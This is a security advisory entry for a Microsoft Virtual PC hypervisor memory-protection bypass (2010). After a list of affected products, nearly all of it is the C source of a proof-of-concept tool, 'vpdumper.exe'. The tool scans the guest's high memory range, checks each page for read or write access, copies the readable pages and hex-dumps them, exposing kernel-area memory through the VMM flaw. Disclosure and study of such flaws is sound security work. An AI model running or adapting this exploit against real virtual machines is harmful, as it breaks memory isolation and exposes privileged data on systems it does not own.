Microsoft Virtual PC Hypervisor Virtual Machine Monitor Security Bypass Vulnerab
Source: neconomou@corest.com  Author: Nicolas  Published: 2010-03-17
=====================================================================================
Microsoft Virtual PC Hypervisor Virtual Machine Monitor Security Bypass Vulnerability
=====================================================================================

Vulnerable:
    Microsoft Windows Virtual PC 0
    Microsoft Windows 7 XP Mode 0
    Microsoft Virtual Server 2005 0
    Microsoft Virtual PC 2007 SP1
    Microsoft Virtual PC 2007 0


#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>
     
#define ROWS 16

void find_leaked_memory ( void );
void print_data ( unsigned int , char * , unsigned int );

int main ( void )
{
    /* message for users */
    printf ( "\n*********** vpdumper.exe ***********" );
    printf ( "\nCreated by Nicolas A. Economou ( neconomou@corest.com )" );
    printf ( "\nCore Security Technologies, Buenos Aires, Argentina ( 2010 )\n" );

    /* Search and Print leaked memory */
    printf ( "\nsearching leaked memory\n" );
    find_leaked_memory ();

    return ( 1 );
}

void find_leaked_memory ( void )
{
        char buffer [ 0x1000 ];
        char *base;
        int r, w;

        /* search the high address memory area */
        for ( base = ( char * ) 0x80000000 ; base < ( char * ) 0xfffff000 ; base += 0x1000 )
        {
          /* Dark Area */
          if ( ( unsigned int ) base == 0xe839c000 )
          {
            continue;
          }

          /* Initialize flags */
          r = FALSE;
          w = FALSE;

          /* check readable */
          if ( IsBadReadPtr ( base , 1 ) == FALSE )
          {
            /* set flag */
            r = TRUE;
          }
          /* check writeable */
          if ( IsBadWritePtr ( base , 1 ) == FALSE )
          {
            /* set flag */
            w = TRUE;
          }
          /* if readable or writeable */
          if ( r == TRUE || w == TRUE )
          {
            /* get contents into our buffer */
            memcpy ( buffer , base , 0x1000 );

            /* print page attributes */
            printf ( "attributes: " );
            printf ( "%s" , ( r == TRUE ) ? "R":"" );
            printf ( "%s" , ( w == TRUE ) ? "W":"" );
            printf ( "\n" );

            /* print the memory */
            print_data ( ( unsigned int ) base , buffer , 0x1000 );
          }
        }
}

void print_data ( unsigned int direccion , char *buffer , unsigned int bytes_a_imprimir )
{
  unsigned int cont;
  unsigned int i;

  /* Print the lines found */
  for ( cont = 0 ; cont < bytes_a_imprimir ; cont = cont + ROWS )
  {
    /* Print the memory address */
    printf ( "%.8x | " , direccion );

    /* Advance the address to display */
    direccion = direccion + ROWS;

    /* Print in hex */
    for ( i = 0 ; i < ROWS ; i ++ )
    {
      /* Print only the number of bytes requested */
      if ( i < ( bytes_a_imprimir - cont ) )
      {
        printf ( "%.2x " , ( unsigned char ) buffer [ i + cont ] );
      }
      else
      {
        printf ( "   " );
      }
    }
    /* Separator between the two columns */
    printf ( "| " );
    /* Print as characters; cast to unsigned char so isgraph() never sees a negative value */
    for ( i = 0 ; i < ROWS ; i ++ )
    {
      if ( i < ( bytes_a_imprimir - cont ) )
      {
        printf ( "%c" , ( isgraph ( ( unsigned char ) buffer [ i + cont ] ) ) ? buffer [ i + cont ] : '.' );
      }
      else
      {
        printf ( " " );
      }
    }
    /* End of line */
    printf ( "\n" );
  }
}




 